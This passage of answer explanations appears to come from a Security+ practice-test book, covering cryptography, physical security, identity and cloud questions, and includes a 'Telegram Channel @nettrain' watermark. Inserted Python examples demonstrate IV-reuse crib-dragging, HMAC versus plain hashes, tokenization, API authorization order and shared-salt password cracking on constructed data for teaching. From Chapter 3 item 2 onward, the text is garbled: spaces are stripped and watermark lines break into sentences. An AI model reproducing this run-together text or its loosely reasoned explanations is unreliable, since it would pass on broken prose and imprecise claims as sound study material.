136. C. The ability to record is not included in many traditional closed-circuit television (CCTV) monitoring systems and is a key element of investigations of theft and other issues. Motion activation and facial recognition are typically associated with computer-based camera systems but do not directly address the concern Maria is working to handle. Infrared cameras would be more useful in spaces where lights were not always in use, such as outdoors or in facilities that are not occupied at night.
137. C. Static codes are typically recorded in a secure location, but if they are not properly secured, or are otherwise exposed, they can be stolen. Brute-force attempts should be detected and prevented by back-off algorithms and other techniques that prevent attacks against multifactor authentication systems. Collisions exist with hashing algorithms, not with static multifactor codes, and clock mismatch issues occur for time-based one-time password (TOTP) codes.
138. B. A symmetric cryptosystem will typically perform faster and with less processor overhead, and thus lower latency, than asymmetric cryptosystems. Hashing is not encryption, and one-time pads are not implemented in modern cryptosystems, although they may have uses in future quantum cryptographic solutions.
139. A. Industrial camouflage efforts minimize how noticeable a facility is, helping it to remain unnoticed by casual observers. Although industrial camouflage can be useful, it is rarely effective against determined adversaries. A demilitarized zone (DMZ) in information security terms is a network segment that is intentionally exposed to the public with appropriate security protecting it, while stronger security is applied to nonpublic resources. Disruptive coloration is a camouflage technique but not one used in information security. Industrial obfuscation was made up for this question.
140. A. Asymmetric cryptography has a relatively high computational overhead, making symmetric key encryption faster. That means that once you can exchange an ephemeral symmetric key, or a series of keys, you can encrypt and send data more quickly and efficiently using symmetric encryption. There is no key length limitation, and reasonable lifespans are met with either technology. Key reuse is not an issue with a public key encryption scheme.
141. D. Failure to release memory you have allocated can lead to a memory leak. Therefore, if you are using a programming language like C++ that allows you to allocate memory, make certain you deallocate that memory as soon as you are finished using it. Allocating only the variable size needed and declaring variables where needed are good programming practices. However, failure to follow them just leads to wasteful use of memory; it does not lead to a security problem like a memory leak. The remaining option is a good idea for preventing buffer overflows, but it is not a memory management issue.
142. B. Using a longer key is the best way to make it less likely that an encrypted file will be cracked. This does not prevent issues with the algorithm itself, but if a vulnerability is not found in an algorithm, adding key length will help ensure that even significant increases in computational power will not result in the encryption being cracked in a reasonable period of time. Quantum computing has the potential to change this, but practical quantum encryption cracking tools are not known to be available yet. An "anti-quantum cipher" is not a real term, and a rotating symmetric key might be used to ensure that a key could not be cracked but does not provide longevity. Instead, it is used to allow ephemeral communications to be less likely to be cracked on an ongoing basis.
143. C. The best answer from this list is DLP, or data loss prevention technology. DLP is designed to protect data from being exposed or leaking from a network using a variety of techniques and technology. Stateful firewalls are used to control which traffic is sent to or from a system but will not detect sensitive data. OEM is an original equipment manufacturer, and security information and event management (SIEM) can help track events and incidents but will not directly protect data itself.
144. C. Encryption keys used for quantum key distribution are sent in the form of qubits. The polarization state of the qubits reflects the bit values of the key. Once sent, the receiver can validate the state of some of those qubits to ensure both sender and receiver have the same key. Bytes and bits are used in traditional data exchanges, and nuquants were made up for this question.
145. B. Two-person control schemes require two individuals to be involved to perform an action. This means that Alicia can implement a two-person control scheme knowing that both individuals would have to be involved to subvert the control process. Biometrics will merely validate that a person is who they say they are, robotic sentries do not add any particular value to this scenario, and a demilitarized zone (DMZ) is used to keep front-facing systems in a zone that can be controlled and secured.
146. A. Social login is an example of a federated approach to using identities. The combination of identity providers and service providers, along with authorization management, is a key part of federation. AAA is authentication, authorization, and accounting and is typically associated with protocols like RADIUS. Privilege creep occurs as staff members change jobs and their privileges are not adjusted to only match their current role. IAM is a broader set of identity and access management practices. Although IAM may be involved in federated identity, this question does not directly describe IAM.
147. A. USB data blockers are used to ensure that cables can only be used for charging, and not for data transfer. None of the other answers to this question are used for this purpose, and in fact all were made up: USB is a serial bus, circuit breakers are used for power, and HMAC-based one-time password (HOTP) is a type of multifactor token algorithm.
148. B. In the platform-as-a-service (PaaS) model, the consumer has access to the infrastructure to create applications and host them. Software-as-a-service (SaaS) supplies a particular application; infrastructure-as-a-service (IaaS) does not directly provide the ability to create applications, although this distinction is quickly blurring; and IDaaS is identity-as-a-service.
149. B. Avoiding reuse of the key components of an encryption process means that even if a malicious actor managed to break the encryption for a message or exchange, the next new initialization vector (IV) and key would require an entirely new brute-force attack. Using a new IV and key does not make brute-force attacks impossible, nor does it make brute force easier. A single successful attack would expose a single message, or however much data was encrypted using that IV and key.
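The answer above frames the benefit of fresh IVs in terms of forcing a new brute-force attack. There is a more immediate reason for stream-style encryption, shown in this added example (not from the book): when two messages share a key and IV, the keystreams are identical and XOR of the two ciphertexts equals XOR of the two plaintexts, so knowing or guessing one plaintext reveals the other with no key at all. The keystream here is a toy built from SHA-256 for illustration only, not a real cipher; real counter-mode and ChaCha20 keystreams have the same property. Key, IVs and messages are constructed.

```python
import hashlib


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Toy keystream for illustration only: SHA-256(key || iv || block counter).
    The point being demonstrated is that the same (key, iv) yields the same bytes."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + iv + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Stream encryption: ciphertext = plaintext XOR keystream. Decryption is the same call."""
    return xor(plaintext, keystream(key, iv, len(plaintext)))


def crib_drag(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """If c1 and c2 share key AND iv, c1 XOR c2 == p1 XOR p2 (the keystream cancels),
    so a known or guessed p1 gives p2 directly. No key needed."""
    return xor(xor(c1, c2), known_p1)


# Constructed demonstration inputs.
KEY = b"constructed-demo-key-not-real-use"
P1 = b"attack at dawn"
P2 = b"retreat at six"


def reuse_scenario() -> bytes:
    """Same key, same IV for two messages: the second plaintext falls out."""
    iv = b"\x00" * 8
    return crib_drag(encrypt(KEY, iv, P1), encrypt(KEY, iv, P2), P1)


def fresh_iv_scenario() -> bytes:
    """Same key, different IV: the keystreams differ and crib-dragging yields noise."""
    c1 = encrypt(KEY, b"\x00" * 8, P1)
    c2 = encrypt(KEY, b"\x01" * 8, P2)
    return crib_drag(c1, c2, P1)


if __name__ == "__main__":
    print("reused IV, recovered:", reuse_scenario())
    print("fresh IV, recovered: ", fresh_iv_scenario())
```

This is why protocols carry a per-message nonce or IV and why a counter-based nonce must never wrap or be reset after a reboot: reuse, not key length, is what breaks the message.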
150. C. The Linux kernel uses user-driven events like keystrokes, mouse movement, and similar events to generate randomness (entropy). The time of day is not random, user logins are typically not frequent enough or random enough to be a useful source of entropy, and network packet timing is not the intended answer because an external party can influence it. If you encounter a question like this and don't know where to start, consider what you know about entropy: it is randomness, so you would be looking for the input that would have the most randomness to it. Thus, you could rule out the time of day, and likely user logins. After that, you might consider what could be controlled by an external party (network packets being sent to the system) and rule that out as a potential attack vector. That leaves keyboard input and mouse movement.
151. C. Elliptic curve encryption schemes allow the use of a shorter key for the same strength that an RSA key would require, reducing the computational overhead required to encrypt and decrypt data. That doesn't mean you should use a short key; instead, you must select a key length that matches your requirements for resistance to brute force and other attacks. Hashing is nonreversible and is not a form of encryption.
152. C. Lighting serves as a deterrent control, making potential malicious actors feel like they may be observed, without dark areas or shadows to hide in. It does not detect actions, it does not compensate for the lack of another control, and although some lights may turn on for motion, the primary purpose is to deter malicious or unwanted actions.
153. C. Edge computing places both data storage and computational power closer to where it is needed to save on bandwidth and to improve the response of associated applications and services. Hybrid computing combines local and cloud computing. Local cloud builds cloud infrastructure on local systems. Mist computing was made up for this question but may sound similar to fog computing, a term that has a similar meaning to edge computing, which uses local computation and storage that is then Internet connected.
154. D. Ben has deployed a tokenization scheme. Encryption would require the data to be decrypted to be used, and this is not mentioned. Hashing could be used to conceal values but does not preserve the ability to work with the data. Masking modifies content to conceal personally identifiable information or other sensitive information.
155. D. Fencing is a useful deterrent because it discourages malicious actors from accessing the grounds that Dana wants to protect. It is also an example of a physical control. A visitor log is an administrative control and will not deter malicious actors. Motion detectors and cameras are examples of detective controls.
156. A. Adding a digital signature can ensure both that the message has not been changed, and thus that its integrity is intact, and that it supports nonrepudiation by proving that the message is from the sender who claims to have sent it.
157. B. Attestation processes request that responsible managers or others validate that user entitlements or privileges are correct and match those that the user should have. Attestation is not an employment verification process, although managers may discover that users who have left the organization still have rights as part of an attestation process. It does not require proof of identity or validation of security controls.
158. B. A generator is the most appropriate answer to a multihour outage. Although a hot site would allow her organization to stay online, the cost of a hot site is much higher than that of a generator. A PDU, or power distribution unit, is used to manage and distribute power, not to handle power outages. Finally, UPS systems are not typically designed to handle long outages. Instead, they condition power and ensure that systems remain online long enough for a generator to take over providing power.
159. A. A MAC supports authentication and integrity and is used to confirm that messages came from the sender who is claimed to have sent them and also ensures that recipients can validate the integrity of the message. It does not help with confidentiality.
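Questions 112 and 159 are two halves of one idea, so here is a single added example (not from the book) covering both: a plain SHA-256 manifest detects a changed binary, but an attacker who can also rewrite the manifest simply recomputes the hash, whereas an HMAC tag cannot be recomputed without the publisher's key. The files, the tampered build and the publisher key are constructed for the demonstration; note that neither mechanism hides the file contents, which is the "no confidentiality" point of question 159.

```python
import hashlib
import hmac

# Constructed sample: two files as distributed, plus a key held only by the
# party that publishes the build (an assumption of this example).
ORIGINAL = {
    "app.bin": b"\x7fELF original build",
    "config.ini": b"debug=0\n",
}
PUBLISHER_KEY = b"constructed-secret-key-not-for-real-use"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_manifest(files: dict) -> dict:
    """Integrity manifest (question 112): file name -> SHA-256 of its contents."""
    return {name: sha256_hex(content) for name, content in files.items()}


def verify_manifest(files: dict, manifest: dict) -> list:
    """Names whose current contents do not match the recorded hash."""
    return sorted(n for n, c in files.items() if manifest.get(n) != sha256_hex(c))


def mac_tag(key: bytes, data: bytes) -> str:
    """HMAC-SHA256 tag (question 159): integrity plus origin, for holders of `key`."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_mac(key: bytes, data: bytes, tag: str) -> bool:
    # compare_digest avoids leaking where the mismatch is through timing.
    return hmac.compare_digest(mac_tag(key, data), tag)


def tamper(files: dict) -> dict:
    """An attacker with write access swaps the binary."""
    changed = dict(files)
    changed["app.bin"] = b"\x7fELF backdoored build"
    return changed


def scenario() -> tuple:
    """Returns (flagged by trusted manifest, flagged by attacker's manifest, MAC accepts tampered file)."""
    trusted_manifest = make_manifest(ORIGINAL)
    trusted_tag = mac_tag(PUBLISHER_KEY, ORIGINAL["app.bin"])
    bad = tamper(ORIGINAL)
    # An attacker who can also rewrite the manifest just recomputes the unkeyed hash.
    forged_manifest = make_manifest(bad)
    return (
        verify_manifest(bad, trusted_manifest),                 # ['app.bin']
        verify_manifest(bad, forged_manifest),                  # []  (plain hash fooled)
        verify_mac(PUBLISHER_KEY, bad["app.bin"], trusted_tag),  # False (no key, no forgery)
    )


if __name__ == "__main__":
    flagged, flagged_forged, mac_ok = scenario()
    print("trusted manifest flags:", flagged)
    print("attacker's manifest flags:", flagged_forged)
    print("MAC accepts tampered binary:", mac_ok)
```

The practical rule that falls out: a hash published next to the file it protects is only as trustworthy as the channel it arrived on; a keyed MAC (or a digital signature, when the verifier should not hold the key) is what actually ties the value to a sender.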
160. C. Inert gas systems are used to reduce the oxygen in a room without the hazard to staff that carbon dioxide systems pose. Both dry-pipe and pre-charge systems use water, which can harm delicate electronics.
161. C. Proximity card readers usually work using RFID (radio frequency ID) technology. This allows cards to be used in proximity but without requiring a direct reader like a magnetic stripe. Neither biometrics nor infrared are used for proximity card readers.
162. A. Digital signatures that use a sender's private key provide nonrepudiation by allowing a sender to prove that they sent a message. Unless the sender's private key has been compromised, signing a message with their private key and allowing the recipient to validate the signature using the sender's public key ensures that the sender sent the message in question. Longer keys don't prove who a sender is, hashes are not reversible, and the public key in use is the sender's, not the recipient's.
163. B. Natural disasters, as well as man-made disasters, are primary considerations when evaluating geographic security. Placing backup sites outside of the likely path or range of a single disaster helps ensure continuity of operations for organizations. MTR is the maximum time to restore, sprawl avoidance is usually considered for virtual machines, and service integration is a consideration for service architectures, not geographical placement.
164. B. Although actual threats from drones and unmanned aerial vehicles (UAVs) are relatively rare for most organizations, placing sensitive areas further inside a building will deter most current generations of drones from entering or recording them. Security doors and other common obstacles will prevent most UAV or drone penetration that typical organizations will face. Fences are easily bypassed by flying drones, biometric sensors won't stop a drone from hovering outside of a window, and Faraday cages might stop a drone from receiving commands if you could get the drone inside first!
165. D. The key trade-off when considering resource constraints for encryption is that stronger encryption with longer keys requires more computational time and resources. This means that it will be slower and will consume more of the capacity of a system. A balance between security and computational overhead needs to be struck that matches the confidentiality needs of the data that is being handled or sent. Stronger encryption is usually slower, running out of entropy in the scenario described is not a typical concern, and stronger encryption taking up significant amounts of drive space is also not a real issue in this scenario.
166. C. Encrypting the message will ensure that it remains confidential as long as only the recipient is able to decrypt it. Hashing the message will result in the message not being recoverable, whereas digitally signing it can provide nonrepudiation. Finally, quantum encryption algorithms and the systems required to use them are not generally available today, meaning Amanda won't be able to use them, yet!
167. C. In most cases, the major cloud service providers have more security staff and a greater budget for security operations. This means they can invest more in security controls, staffing, monitoring, and other activities. Using a cloud service provider can help improve the overall security posture of an organization that might not have the ability to have full-time or dedicated security staff or expertise. At the same time, local staff will understand the business better and will usually have a faster response time to critical business needs.
168. D. Network load balancers distribute traffic among systems, allowing systems to be added or removed, and making patching and upgrades easier by draining connections from systems and removing them from the pool when work needs to be done on them. They can also help monitor systems for performance, report on issues, and ensure that loads match the capabilities of the systems that they are in front of. Firewalls are used for security, switches are network devices used to transfer traffic to the correct system, and a horizontal scaler was made up for this question.
169. D. Protected cable distribution uses such controls as electrical, electromagnetic, and even acoustic or air pressure sensors to ensure that cables and distribution infrastructure are not accessed, allowing sensitive information to be transmitted in unencrypted form. The U.S. government identifies three options: hardened carrier, alarmed carrier, and continuously viewed protected distribution systems. Shielded cables are used to prevent EMI.
170. B. Maureen is using the concept of audio steganography by hiding data inside an audio file in a way that conceals it from detection. The other options are made up for this question.
171. B. Since Nicole is specifically worried about SMS pushes to cell phones, the most likely attack model is SIM (subscriber identity module) cloning, allowing attackers to obtain the authentication codes sent to legitimate users. Attacks on a Voice over Internet Protocol (VoIP) system would typically help intercept SMS if it was sent to VoIP phones, not cell phones (although forwarding is possible, it is not mentioned here). Brute-force attacks are unlikely to succeed against SMS phone factors, and rainbow tables are used to crack hashed passwords.
172. C. Encryption is often used to protect data at rest. When data needs to be accessed, it can be decrypted. Hashing is not reversible, meaning that it is not used for data storage when the original form is needed for processing. Comparing hashed passwords works because the password is presented again, rather than the password needing to be retrieved from storage. TLS is used to protect data in motion, and tokenization is a data security technique that replaces sensitive data elements with nonsensitive elements that can still be processed in useful ways.
173. B. Nathaniel has created an air gap, a physical separation that will require manual transport of files, patches, and other data between the two environments. This helps to ensure that attackers cannot access critical systems and that insiders cannot export data from the environment easily. A demilitarized zone (DMZ) is a separate network segment or zone that is exposed to the outside world or other lower trust area. A vault is a secured space or room, but vaulting is not a term used on the Security+ exam, and a hot aisle is the aisle where servers exhaust warm air.
174. A. Masking modifies content to conceal personally identifiable information (PII) or other sensitive information. Tokenization replaces sensitive information with a nonsensitive alternative that allows the data to still be processed in useful ways. Encryption would require the data to be decrypted to be used, and this is not mentioned. Hashing could be used to conceal values but does not preserve the ability to work with the data.
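Questions 154 and 174 distinguish tokenization, masking and hashing by what you can still do with the output. This added example (not from the book) implements all three over a constructed card-number log: a token vault that hands out random, stable tokens and keeps the only mapping back; a mask that leaves the last four digits for display; and a hash that supports equality checks only. The card numbers, amounts and the `tok_` prefix are all constructed for the demonstration.

```python
import hashlib
import secrets

# Constructed transaction log (not from the original page): (card number, amount).
TRANSACTIONS = [
    ("4111 1111 1111 1111", 25.00),
    ("5500 0000 0000 0004", 10.00),
    ("4111 1111 1111 1111", 15.50),
]


class TokenVault:
    """Tokenization (questions 154/174): each sensitive value is replaced by a
    random token; only the vault can map a token back. Everything downstream
    handles tokens, never the card number."""

    def __init__(self):
        self._token_of = {}
        self._value_of = {}

    def tokenize(self, value: str) -> str:
        if value not in self._token_of:        # stable: same value -> same token
            token = "tok_" + secrets.token_hex(8)
            self._token_of[value] = token
            self._value_of[token] = value
        return self._token_of[value]

    def detokenize(self, token: str) -> str:
        return self._value_of[token]           # KeyError for unknown tokens


def mask_pan(pan: str, visible: int = 4) -> str:
    """Masking: conceal all but the last `visible` digits. Fine for a receipt,
    useless for joining records, and not reversible."""
    digits = pan.replace(" ", "")
    return "*" * (len(digits) - visible) + digits[-visible:]


def hash_pan(pan: str) -> str:
    """Hashing: one-way, so it supports equality lookups only. Card numbers
    have a small, structured input space, so an unkeyed hash of one is
    guessable and is no substitute for tokenization."""
    return hashlib.sha256(pan.replace(" ", "").encode()).hexdigest()


def spend_per_token(transactions, vault: TokenVault) -> dict:
    """Analytics on tokens: totals per customer without handling a card number."""
    totals = {}
    for pan, amount in transactions:
        token = vault.tokenize(pan)
        totals[token] = totals.get(token, 0.0) + amount
    return totals


if __name__ == "__main__":
    vault = TokenVault()
    for token, total in spend_per_token(TRANSACTIONS, vault).items():
        print(f"{token}: {total:.2f}  (display: {mask_pan(vault.detokenize(token))})")
```

The vault is the crown jewel in a tokenization design: the analytics tier in this example never needs access to it, which is exactly the scope reduction the technique is deployed for.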
175. C. On-premises cloud computing is often called private cloud. Not all private clouds have to be on-site, because private clouds could be deployed to a remote location like a third-party hosting facility. Infrastructure as a service and platform as a service refer to third-party hosting services, and hybrid cloud combines both on-premises and cloud computing models.
176. C. The most likely threat to physical tokens is theft or loss resulting in access to the token. Cloning tokens might be possible if the token's seed were known, but they are designed to prevent this from being reverse-engineered, meaning a significant breach of the vendor or similar issue would be required to cause an exposure. Brute force is not a realistic threat against most token implementations, nor is algorithm failure.
177. D. Control diversity means utilizing different controls to mitigate the same threat. For malware, the use of technical controls, such as antimalware, is critical. But it is also important to have administrative controls, such as good policies, and to ensure that employees are properly trained. Thus, for this question a combination of policies, training, and tools is the best answer.
178. A. Although it may seem like Charles has presented two factors, in fact he has only presented two types of things he knows along with his identity. To truly implement a multifactor environment, he should use more than one of something you have, something you know, and something you are.
179. C. Salt reuse is a critical mistake, because it would allow a rainbow table to be generated using that salt. Although standard rainbow tables would not work, a reused salt would only require the creation of a single new rainbow table. Alphanumeric salts are not a problem, long salts are not a problem, and this salt is a reasonable length at 16 characters using hexadecimal.
180. B. Alaina's need for a local, secure storage area is an ideal situation for the use of a vault or safe where the keys can be stored on a device like a thumb drive. Simply placing them on a drive leaves them vulnerable to theft, and an air-gapped system would also be potentially exposed to theft or local breaches.
181. B. It is critical to authenticate API users and then to authorize them to take actions. If you authorized first and then authenticated, users could take action before you knew who they were! Encrypting throughout the use of the API keeps data and queries secure, validating input and filtering out dangerous strings is important to prevent injection and other attacks, and auditing and logging allow you to troubleshoot and respond to issues and attacks.
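The ordering in the answer above is easiest to enforce in one place, so here is an added example (not from the book) of an API endpoint wrapper that fixes the sequence: authenticate, authorize, validate input, act, audit. The API keys, users, roles and endpoint are constructed stand-ins for a real identity store; the status codes follow the usual HTTP convention of 401 for "who are you?" and 403 for "you, but no".

```python
import hmac
from functools import wraps

# Constructed credential and role stores (stand-ins for a real identity system).
API_KEYS = {"key-alice-123": "alice", "key-bob-456": "bob"}
ROLES = {"alice": {"reader", "writer"}, "bob": {"reader"}}
AUDIT_LOG = []   # (user, endpoint, args) for every action that actually ran


class AuthError(Exception):
    """Identity could not be established."""


class Forbidden(Exception):
    """Identity is known but lacks the needed role."""


def authenticate(request: dict) -> str:
    """Step 1: who is calling? Constant-time compare against each stored key."""
    presented = request.get("api_key", "")
    for key, user in API_KEYS.items():
        if hmac.compare_digest(key, presented):
            return user
    raise AuthError("unknown or missing API key")


def authorize(user: str, role: str) -> None:
    """Step 2: may this *authenticated* user do this? Only ever called after step 1."""
    if role not in ROLES.get(user, set()):
        raise Forbidden(f"{user} lacks role {role!r}")


def require(role: str):
    """Decorator that pins the order: authenticate, authorize, then run (which validates input), then audit."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(request, *args, **kwargs):
            user = authenticate(request)
            authorize(user, role)
            result = fn(user, *args, **kwargs)
            AUDIT_LOG.append((user, fn.__name__, args))
            return result
        return wrapper
    return decorator


@require("writer")
def delete_record(user: str, record_id) -> str:
    # Step 3: input validation before anything touches a data store.
    if not isinstance(record_id, int) or record_id < 0:
        raise ValueError("record_id must be a non-negative integer")
    return f"{user} deleted record {record_id}"


def call(endpoint, request: dict, *args):
    """Invoke an endpoint and map outcomes to (status, detail) as an API layer would."""
    try:
        return "200", endpoint(request, *args)
    except AuthError as e:
        return "401", str(e)
    except Forbidden as e:
        return "403", str(e)
    except ValueError as e:
        return "400", str(e)


if __name__ == "__main__":
    print(call(delete_record, {"api_key": "key-alice-123"}, 7))
    print(call(delete_record, {"api_key": "key-bob-456"}, 7))
    print(call(delete_record, {}, 7))
    print(call(delete_record, {"api_key": "key-alice-123"}, "7; DROP TABLE records"))
```

Because the decorator owns the sequence, a new endpoint cannot accidentally check roles on an unauthenticated request or run its body before either check; adding transport encryption is then a deployment concern (TLS in front of this service) rather than per-endpoint code.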
182. C. Frank has used a degausser to erase the data on the tapes. Degaussing only works on magnetic media like tapes and will not work on optical or flash media. Burning media or materials is exactly what it sounds like: putting them into a fire! Shredding and pulping are mechanical means of destruction.
183. A. 5G requires higher antenna density for full bandwidth communication than previous technologies, meaning that Angela's organization will have to carefully consider antenna placement, particularly inside buildings where structural elements can create challenges with signal propagation. 5G is usable indoors, is commercially available, and can coexist with traditional Wi-Fi, so Angela should not include those in her list of concerns.
184. A. Chris is concerned about privilege creep, the slow accumulation of privileges over time as staff members change roles and their privileges are not removed or updated. Privilege management processes would help to prevent this, thus keeping data more secure. Of the other options, only privilege escalation is a common term, and it means gaining additional privileges, typically as part of an attack from an account with fewer privileges to a more privileged account like an administrator or root account.
185. C. Honeyfiles are files that are intended to help detect attackers. They are placed in a location where accessing them can be detected and where no legitimate user has a reason to open them. That means that attackers who access the seemingly desirable file can be easily detected and appropriate alerts can be sent.
186. C. Although there is no specific recommended distance, recommendations typically range from 60 to 120 miles away to ensure that a single disaster is unlikely to disable both locations.
187. B. Fog computing is a term coined by Cisco to describe cloud computing at the edge of an enterprise network. The more common term for this is edge computing, but you may encounter both terms. Fog implementations handle significant amounts of computation, communication, and storage activities locally, while also connecting to cloud services to perform some of the work.
188. A. Bcrypt, scrypt, and PBKDF2 are all examples of key stretching algorithms. MD5 and SHA1 are both hashing algorithms, and ncrypt was made up for this question.
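Questions 179 and 188 go together: key stretching makes each guess expensive, and per-user salts stop that expense from being paid once and shared across every account. This added example (not from the book) stores passwords with PBKDF2-HMAC-SHA256 from the standard library and then plays the attacker, building one lookup table per distinct salt (the practical stand-in for the rainbow table question 179 describes). With one shared salt a single table cracks every account; with per-user salts the attacker must rebuild the table per account. The users, passwords, wordlist and the deliberately low iteration count are constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Work factor kept low so the demonstration runs in a second or two. A real
# deployment uses a far higher count, or bcrypt/scrypt/Argon2.
DEMO_ITERATIONS = 5_000

WORDLIST = ["password", "letmein", "hunter2", "qwerty", "summer2021"]   # constructed
USERS = {"alice": "hunter2", "bob": "qwerty", "carol": "letmein"}       # constructed


def stretch(password: str, salt: bytes, iterations: int = DEMO_ITERATIONS) -> bytes:
    """PBKDF2-HMAC-SHA256: a key stretching function (question 188)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def store(users: dict, salt_for) -> dict:
    """Build password records; `salt_for(user)` is the salting policy under test."""
    records = {}
    for user, pw in users.items():
        salt = salt_for(user)
        records[user] = {"salt": salt, "hash": stretch(pw, salt)}
    return records


def check(record: dict, password: str) -> bool:
    """Login check: re-stretch with the stored salt and compare in constant time."""
    return hmac.compare_digest(record["hash"], stretch(password, record["salt"]))


def crack(records: dict, wordlist) -> tuple:
    """Attacker: one precomputed table per distinct salt (question 179).
    Returns (cracked {user: password}, number of tables built)."""
    tables, cracked = {}, {}
    for user, rec in records.items():
        salt = rec["salt"]
        if salt not in tables:
            tables[salt] = {stretch(w, salt): w for w in wordlist}
        if rec["hash"] in tables[salt]:
            cracked[user] = tables[salt][rec["hash"]]
    return cracked, len(tables)


SHARED_SALT = bytes.fromhex("0123456789abcdef")   # one 16-hex-char salt reused for everyone


def shared_salt_scenario() -> tuple:
    return crack(store(USERS, lambda user: SHARED_SALT), WORDLIST)


def per_user_salt_scenario() -> tuple:
    return crack(store(USERS, lambda user: os.urandom(16)), WORDLIST)


if __name__ == "__main__":
    for name, fn in (("shared salt", shared_salt_scenario), ("per-user salt", per_user_salt_scenario)):
        cracked, tables = fn()
        print(f"{name}: {len(cracked)} of {len(USERS)} cracked using {tables} table(s)")
```

Note what salting does not do: every account here still falls, because the passwords are in the wordlist. Salts remove the shared precomputation and the stretching multiplies the per-guess cost; neither rescues a weak password.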
189. C. The only directory service listed is Lightweight Directory Access Protocol (LDAP). SAML is Security Assertion Markup Language, OAuth is an authorization delegation protocol, and 802.1X is a network authentication protocol.
Chapter 3: Implementation

1. A. Dual control, which requires two individuals to perform a function; split knowledge, which splits the passphrase or key between two or more people; and separation of duties, which ensures that a single individual does not control or oversee the entire process, all help prevent insider threats when managing a PKI. Requiring a new passphrase when a certificate is used is not a reasonable solution and would require reissuing the certificate.
2. B. AsitesurveyistheprocessofidentifyingwhereaccesspointsshouldbelocatedforbestcoverageandidentifyingexistingsourcesofRFinterference,includingpreexistingwirelessnetworksandotherdevicesthatmayusethesameradiofrequencyspectrum.Byconductingasitesurvey,Naomicanguidetheplacementofheraccesspointsaswellascreateachanneldesignthatwillworkbestforherorganization.
3. B. TheoptionthatbestmeetstheneedsdescribedaboveisPEAP,theProtectedExtensibleAuthenticationProtocol.PEAPreliesonserver-sidecertificatesandreliesontunnelingtoensurecommunicationssecurity.EAP-MD5isnotrecommendedforwirelessnetworksanddoesnotsupportmutualauthenticationofthewirelessclientandnetwork.LEAP,theLightweightExtensibleAuthenticationProtocol,usesWEPkeysforitsencryptionandisnotrecommendedduetosecurityissues.Finally,EAP-TLS,orEAPTransportLayerSecurity,requirescertificatesonboththeclientandserver,consumingmoremanagementoverhead.
4. C. East-westtrafficistrafficsentlaterallyinsideanetwork.Somenetworksfocussecuritytoolsattheedgesorplaceswherenetworksinterconnect,leavinginternal,oreast-west,trafficopen.Inzero-trustenvironments,internaltrafficisnotpresumedtobetrustworthy,reducingtherisksofthistypeoflateralcommunication.Side-stepping,slidertraffic,andpeerinterconnectwereallmadeupforthisquestion,althoughpeerinterconnectmaysoundsimilartopeer-to-peertraffic,whichmaybelateralinmanynetworks.
5. C. AlthoughpreventingMultipurposeInternetMailExtensions(MIME)sniffingmaysoundhumorous,MIMEsniffingcanbeusedincross-sitescriptingattacks,andtheX-Content-Type-OptionsheaderhelpspreventMIMEsniffing.HTTPsecurity-orientedheaderscanalsosetX-Frameoptions,turnoncross-sitescriptingprotection,setcontentsecuritypolicies,
Telegram Channel @nettrain
andrequiretransportsecurity.Thereisn’ta“DisableSQLinjection”header,however!
6. C. Mobiledevicemanagement(MDM)suitesoftenprovidetheabilitytomanagecontentondevicesaswellasapplications.UsingcontentmanagementtoolscanallowCharlenetoprovisionfiles,documents,andmediatothedevicesthatstaffmembersinherorganizationareissued.Applicationmanagementwouldbeusefulforapps.Remotewipecanremovedataandapplicationsfromthedeviceifitislostorstolen,oranemployeeleavestheorganization.Pushnotificationsareusefulwheninformationneedstobeprovidedtothedeviceuser.
7. C. Inthisscenario,Dennyspecificallyneedstoensurethathestopsthemostmalware.Insituationslikethis,vendordiversityisthebestwaytodetectmoremalware,andinstallingadifferentvendor’santivirus(AV)packageonserverslikeemailserversandtheninstallingamanagedpackageforPCswillresultinthemostdetectionsinalmostallcases.InstallingmorethanoneAVpackageonthesamesystemisrarelyrecommended,sincethisoftencausesperformanceissuesandconflictsbetweenthepackages—infact,attimesAVpackageshavebeenknowntodetectotherAVpackagesbecauseofthedeephookstheyplaceintotheoperatingsystemtodetectmaliciousactivity!
8. B. Amandahasencounteredacaptiveportal.Captiveportalsredirectalltraffictotheportalpage,eithertoallowtheportaltocollectinformationortodisplaythepageitself.Onceusershavecompletedtherequirementsthattheportalputsinplace,theyarepermittedtobrowsetheInternet.ThismaybeaccomplishedbyassigninganewIPaddressorbyallowingtheconnectedIPaddresstohaveaccesstotheInternetusingafirewallruleorothersimilarmethod.Presharedkeysareusedinwirelessnetworksforauthentication.Portsecurityisusedforwirednetworks,andWPAstandsforWi-FiProtectedAccess,asinWPA,WPA-2,andWPA-3.
9. B. DomainNameSystemSecurityExtensions,orDNSSEC,providestheabilitytovalidateDNSdataanddenialofexistence,andprovidesdataintegrityforDNS.Itdoesnotprovideconfidentialityoravailabilitycontrols.IfCharlesneedstoprovidethose,hewillhavetoimplementadditionalcontrols.
10. B. Googleisactingasanidentityprovider,orIdP.AnIdPcreatesandmanagesidentitiesforfederations.AnRPisarelyingparty,whichrelieson
Telegram Channel @nettrain
anidentityprovider.AnSPisaserviceprovider,andanRAisaregistrationauthorityinvolvedintheprocessforprovidingcryptographiccertificates.
11. C. SSH,orSecureShell,isasecureprotocolusedtoconnecttocommand-lineshells.SSHcanalsobeusedtotunnelotherprotocols,makingitausefulandfrequentlyusedtoolforsystemadministrators,securityprofessionals,andattackers.UsingHTTPSorTransportLayerSecurity(TLS)forasecurecommandlineisrare,andTelnetisaninsecureprotocol.
12. B. Of the options provided, only FIDO U2F, an open standard provided by the Fast IDentity Online Alliance, is a standard for security keys. Other standards that you may encounter include OTP (One Time Password), Smart Card, OATH-HOTP, and OpenPGP. Of note, OATH, the Initiative for Open Authentication, provides standards for both HMAC-based one-time password (HOTP) and TOTP, or time-based one-time passwords. SAML (Security Assertion Markup Language) and OpenID are both used in authentication processes but not for security keys. ARF was made up for this question.
